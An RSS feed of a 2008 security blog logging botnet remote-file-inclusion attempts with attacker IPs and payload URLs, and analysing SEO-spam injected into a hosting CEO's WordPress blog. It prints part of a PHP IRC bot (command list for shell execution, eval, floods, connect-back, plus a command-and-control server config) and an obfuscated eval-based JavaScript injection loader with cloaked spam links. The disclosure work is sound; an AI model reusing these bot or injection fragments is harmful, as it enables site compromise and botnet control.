<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; BotNet</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/botnet//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 22:59:53 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[googlebot]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</guid>
		<description><![CDATA[

 Today&#8217;s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &#8595;. The first attacker is from 212.24.62.200 &#8594; udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> Today&#8217;s we just upgrade from <strong>WordPress 2.3.2</strong> to <strong>2.3.3 security release</strong>. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &darr;. The first attacker is from 212.24.62.200 &rarr; udkado.ru masking their useragent as <strong>Googlebot</strong> (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. </p>
<p>The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of <abbr title="Dynamic Domain Name Server">DDNS</abbr> (china &rarr; korea &rarr; us ). Noticeably the scans pattern is predictable. From our <a href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Feb 5th attack</a> all these botnet is targeting certain search keywords <em>security, injection</em> so we setup a honey-pot right on that particular URL.<br />
<span id="more-189"></span></p>
<h2>Hacking Attempts on Kakkoi</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=212.24.62.200" class="exturl icn-r" rel="nofollow">212.24.62.200</a></small></td>
<td><small><a href="http://www.useragentstring.com/pages/Googlebot/">Googlebot</a></small></td>
<td>1</td>
<td><small><a href="http://api.hostip.info/?ip=212.24.62.200" class="exturl icn-r" rel="nofollow">Russia</a></small></td>
<td>
<ul class="xoxo r">
<li><small>www.yahoo.com</small></li>
<li><small>Request URI: <a href="/uri/d3d3LnlhaG9vLmNvbQ.curie,80,302" rev="curie:302" title="Yahoo!">www.yahoo.com</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=61.152.158.46" class="exturl icn-r" rel="nofollow">61.152.158.46</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=61.152.158.46" class="exturl icn-r" rel="nofollow">China</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td>
<ol class="xoxo r">
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.88.3.47" class="exturl icn-r" rel="nofollow">85.88.3.47</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=74.205.123.49" class="exturl icn-r" rel="nofollow">74.205.123.49</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=210.205.6.161" class="exturl icn-r" rel="nofollow">210.205.6.161</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=207.44.246.45" class="exturl icn-r" rel="nofollow">207.44.246.45</a></small></li>
</ol>
</td>
<td>N/A</td>
<td>16</td>
<td>
<ol class="xoxo r">
<li><small><a href="http://api.hostip.info/?ip=85.88.3.47" class="exturl icn-r" rel="nofollow">Germany</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=74.205.123.49" class="exturl icn-r" rel="nofollow">US</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=210.205.6.161" class="exturl icn-r" rel="nofollow">Korea</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=207.44.246.45" class="exturl icn-r" rel="nofollow">US</a></small></li>
</ol>
</td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>The Bot-herder Host</h2>
<p>Part of class <strong>pBot</strong> source taken from <tt class="di">http://basiclifesaving.org/mycomments/rom.txt</tt></p>
<pre class="prebox">
&lt;? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ &lt;admin@xdevil.org&gt;
 *
 * COMMANDS:
 *
 * .user &lt;password&gt; //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail &lt;to&gt; &lt;from&gt; &lt;subject&gt; &lt;msg&gt; //send an email
 * .dns &lt;IP|HOST&gt; //dns lookup
 * .download &lt;URL&gt; &lt;filename&gt; //download a file
 * .exec &lt;cmd&gt; // uses exec() //execute a command
 * .sexec &lt;cmd&gt; // uses shell_exec() //execute a command
 * .cmd &lt;cmd&gt; // uses popen() //execute a command
 * .info //get system information
 * .php &lt;php code&gt; // uses eval() //execute php code
 * .tcpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;port&gt; &lt;delay&gt; //tcpflood attack
 * .udpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;delay&gt; //udpflood attack
 * .raw &lt;cmd&gt; //raw IRC command
 * .rndnick //change nickname
 * .pscan &lt;host&gt; &lt;port&gt; //port scan
 * .safe // test safe_mode (dvl)
 * .inbox &lt;to&gt; // test inbox (dvl)
 * .conback &lt;ip&gt; &lt;port&gt; // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo &quot;Ok unlocker. We did i!&quot;;

class pBot
{
 var $config = array(&quot;server&quot;=&gt;&quot;Bucharest.ro.eu.ultra-chat.org&quot;,
 &quot;port&quot;=&gt;&quot;6667&quot;,
 &quot;pass&quot;=&gt;&quot;n&quot;,
 &quot;prefix&quot;=&gt;&quot;[R]&quot;,
 &quot;maxrand&quot;=&gt;&quot;4&quot;,
 &quot;chan&quot;=&gt;&quot;#unlocker&quot;,
 &quot;chan2&quot;=&gt;&quot;#unlocker&quot;,
 &quot;key&quot;=&gt;&quot;n&quot;,
 &quot;modes&quot;=&gt;&quot;+p&quot;,
 &quot;password&quot;=&gt;&quot;n&quot;,
 &quot;trigger&quot;=&gt;&quot;.&quot;,
 &quot;hostauth&quot;=&gt;&quot;Robert.users.ultra-chat.org&quot; // * for any hostname (remember: /setvhost xdevil.org)
 );
</pre>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</a></li>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 12:13:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</guid>
		<description><![CDATA[

 I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful &#8595;.

Failed Hacking Attempts
Sort by Injection type.



IP / DDNS
UA
ATT
Country
Params




85.25.10.30
N/A
2
Germany


http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt
Request URI: /security/injection/




]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these <a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Botnet</a> (Bot-herder) will be published in this post. Somebody might find the informations useful &darr;.<br />
<span id="more-178"></span></p>
<h2>Failed Hacking Attempts</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.25.10.30" class="exturl icn-r" rel="nofollow">85.25.10.30</a></small></td>
<td>N/A</td>
<td>2</td>
<td><small><a href="http://api.hostip.info/?ip=85.25.10.30" class="exturl icn-r" rel="nofollow">Germany</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt</small></li>
<li><small>Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=200.226.246.22class="exturl icn-r" rel="nofollow">200.226.246.22</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=200.226.246.22" class="exturl icn-r" rel="nofollow">Brazil</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=203.151.233.24" class="exturl icn-r" rel="nofollow">203.151.233.24</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=203.151.233.24" class="exturl icn-r" rel="nofollow">Thailand</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=69.10.135.176" class="exturl icn-r" rel="nofollow">69.10.135.176</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=69.10.135.176" class="exturl icn-r" rel="nofollow">Canada</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://chmod.altervista.org/modalita/cmd2.txt</small></li>
<li><small> Request URI: <a href="/security/vulnerability/fixes-statscounter-updatesh-vulnerability/">/fixes-statscounter-updatesh-vulnerability/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</title>
		<link>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/#comments</comments>
		<pubDate>Thu, 31 Jan 2008 17:07:22 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[Being Hacked by SEO spammer is like a yearly events at Mattheaton.com. Bluehost CEO WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at  &#8594; Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />Being Hacked by SEO spammer is seem like a yearly events at <span class="vcard"><a href="http://mattheaton.com" class="url fn microformat icn-r1">Mattheaton.com</a></span>. Matt&#8217;s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a>.</p>
<p>It&#8217;s a big embarrassment for <a rel="nofollow" class="exturl icn-r1" href="http://www.bluehost.com">bluehost</a> &#038; <a rel="nofollow" href="http://www.hostmonster.com" class="exturl icn-r1">hostmonster</a> hosting to have their CEO&#8217;s blog being spamride every year (since 2007) . Drilling Matt Heaton&#8217;s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.</p>
<p><span id="more-156"></span></p>
<h2 class="cb mgt">Mattheaton Goro Spam Chronology</h2>
<table>
<thead>
<tr>
<th>Date</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr>
<td><small>Jul 2007</small></td>
<td> Google PR 7</td>
</tr>
<tr>
<td><small>Aug 2007</small></td>
<td> Stop being Index by <a rel="nofollow" class="exturl icn-r1" href="http://web.archive.org/web/*/http://www.mattheaton.com">archive.org</a></td>
</tr>
<tr>
<td><small>Nov 28th 2007</small></td>
<td> <strong class="fw-">Wordpress.net.in</strong> Goro Spam on wp_footer backlink to <a class="exturl icn-r1" href="http://www.howardowens.com/">howardowens.com</a></td>
</tr>
<tr>
<td><small>Dec 4th 2007</small></td>
<td>Unknown Goro Spam on wp_head backlink to <a href="http://tangonoticias.com/" class="exturl icn-r1">tangonoticias.com</a></td>
</tr>
<tr>
<td><small>Dec 11th 2007</small></td>
<td>Wordpress Upgrade to version 2.3.1</td>
</tr>
<tr>
<td><small>Jan 16th, 2008</small></td>
<td>Google PR5</td>
</tr>
<tr>
<td><small>Jan 26th, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.brainware-india.com/" rel="nofollow" class="exturl icn-r1">brainwave-india.com</a></td>
</tr>
<tr>
<td><small>Feb 3rd, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.thinkingphp.org/" rel="nofollow" class="exturl icn-r1">thinkingphp.org</a></td>
</tr>
<tr>
<td><small>Feb 8th, 2008</small></td>
<td>Unknown uusing CSS cloacking method on wp_head backlink to <a href="http://www.zoorender.com/" rel="nofollow" class="exturl icn-r1">zoorender.com</a></td>
</tr>
<tr>
<td><small>Feb 13th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a></td>
</tr>
<tr>
<td><small>Feb 20th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.entrepreneur27.org/" class="exturl icn-r1">entrepreneur27.org</a></td>
</tr>
<tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>Feb 24th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="www.latenightpc.com">latenightpc.com</a></td>
</tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>Feb 26th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.communitynext.com" class="exturl icn-r1" title="www.communitynext.com">communitynext.com</a></td>
</tr>
</tbody>
</table>
<h2 class="cb mgt mgb-">Wordpress.net.in GORO Spam Pattern</h2>
<ul class="xoxo exturl pdt">
<li>All the infected sites will stop being index by archive.org few months before the spam started.</li>
<li>From Nov 2007 to Jan 2008 (Right after Google Mass <abbr title="pay-per---post"> P3</abbr> De-rank fever) - The Blackhat Goro Spammer is targeting PR6 &#038; PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)</li>
<li>I categorize this blackhat method as <a href="http://en.wikipedia.org/wiki/Sybil_attack">Sybil Attack</a><br />
<blockquote cite="http://en.wikipedia.org/wiki/Reputation_system"><p class="quote">A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system&#8217;s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.</p>
</blockquote>
<p>- Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) </li>
<li>Goro signatures:
<ol>
<li>html div with id &#8220;goro&#8221;
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt; &lt;a href=&quot;&gt;...&lt;/a&gt; &lt;/div&gt;
</pre>
</li>
<li>javascript function name &#8220;getme()&#8221;
<pre class="smallbox">&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;
</pre>
</li>
<li>Output spam on WordPress wp_footer &#038; wp_head hook</li>
</ol>
</ul>
<h2>Blackhat SEO Spamdexing Google Local Search Index</h2>
<p>The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.</p>
<h3 class="title-">View Spamdexing Google Local Search Image</h3>
<div id="spamdexing-google-local-search" class="dn">
<img src='/wp-content/uploads/2008/01/mattheaton-comeback.png' alt='spamdexing-google-localsearch.png' class="mgb ta-c" width="500" height="800" /></p>
<p class="notice cb mgt">Note: A blackhat at hoqwarts ;)</p>
</div>
<h2 class="cb mgb-">ScreenGrab</h2>
<ul class="xoxo pdt exturl">
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/mattheatoncom-jan-08.png' title='screenshot of mattheaton.com on january 2008' type="image/png" class="icn-">mattheaton.com Jan 28 2008</a> <small>(1009 x 6576 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/levitra-tagging-googlebot.png' title='brainwave-india hacked by goro' type="image/png" class="icn-">brainwave-india.com Jan 28 2008</a> <small>(1016 x 2306 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/localsearch.png' title='Spamdexing Google Localsearch' type="image/png" class="icn-">Google Local Search Jan 28 2008</a> Spamdexing Results</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra.png' title='stc-israel.org.il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (hidden text)</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra-white.png' title='stc-israel.org il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (text reveal)</li>
</ul>
<h2 class="cb mgt mgb">Recent Update</h2>
<ul class="xoxo r">
<li><span class="fw">Feb 1, 2008</span> - we send a letter to <span class="vcard"><a href="mailto:matt@bluehost.com" class="url fn email microformat icn-l">matt@bluehost.com</a></span> regarding this issue. Still waiting for his replies</li>
<li><span class="fw">Feb 3, 2008</span> - The Blackhat Goro Spammer change their target spamhost from <a href="http://www.brainwave-india.com" class="exturl icn-r">http://www.brainwave-india.com</a> <small>(PR6)</small> to <a href="http://www.thinkingphp.org" class="exturl icn-r">http://www.thinkingphp.org</a> <small>(PR6)</small> - <span class="vcard"><a href="http://www.fg-webdesign.de/en/" class="url fn microformat icn-l">Felix Geisend&#246;rfer</a></span>.
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt;&lt;a href=&quot;http://www.thinkingphp.org/?read=796 ... prescription&lt;/a&gt;&lt;/div&gt;&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;</pre>
<p><strong>thinkingphp.org</strong> blog is running on <em>WordPress 2.3.2</em>. We send him email regarding the <strong class="fw-">Goro Spam hijack</strong>.
</li>
<li id="feb8"><span class="fw">Feb 8th 2008</span>, There is no signature of Goro spam (tag with id goro) on Matt&#8217;s blog the blackhat is now using <em>Inline CSS Position Overflow </em> to hide the spams links &darr; redirect to <a href="http://www.zoorender.com" class="exturl icn-r1">zoorender.com</a> <small>(PR6)</small>.
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.zoorender.com/?discount=1776&quot;&gt;buying .. &lt;/div&gt;
</pre>
</li>
<li id="feb13"><span class="fw">Feb 13th 2008</span>, Same methods as above (inline css cloacking) .
<ul>
<li>HTML Code shown to a Regular Browser &rarr; 32,246 characters</li>
<li>HTML Code shown to Google Bot &rarr; 34,646 characters</li>
</ul>
<p>redirect to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a> <small>(PR7)</small>.</p>
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://blog.jensfranke.com/?read=606&quot;&gt;buy generic fi
</pre>
</li>
<li id="feb20"><span class="fw">Feb 20th 2008</span>, CSS Cloacking redirect to <a href="http://http://www.entrepreneur27.org/" class="exturl icn-r1">http://www.entrepreneur27.org/</a> <small>(PR6)</small>.
<pre class="smallbox">
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1591&quot;&gt;bad side effects of viagra&lt;/a&gt;&amp;nbsp;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1592&quot;&gt; ...
&lt;/div&gt;
</pre>
<li id="feb-24-08"><span class="fw">Feb 24th 2008</span>, CSS Cloacking redirect to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="latenightpc.com">http://www.latenightpc.com</a> <small>(PR5)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>mattheaton-com-022408-source.txt</a></small></li>
<li id="feb-26-08"><span class="fw">Feb 26th 2008</span>, CSS Cloacking redirect to <a href="http://www.communitynext.com/" class="exturl icn-r1" title="www.communitynext.com">http://www.communitynext.com/</a> WordPress 2.3.3 <small>(PR6)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>mattheaton-com-022608-source.txt</a></small>
</li>
</ul>
<h2 class="mgt mgb-">Related Posts</h2>
<ul class="xoxo pdt exturl">
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed wordpress.net.in Spam Injection"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a></li>
</ul>
<h2 class="cb mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/d3d3Lm1hdHRoZWF0b24uY29t.curie,80,302" title="Bluehost and Hostmonster CEO Blog">Bluehost &#038; Hostmonster CEO&#8217;s Blog</a></li>
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://en.wikipedia.org/wiki/Spamdexing">Wikipedia &#8594; Spamdexing</a></li>
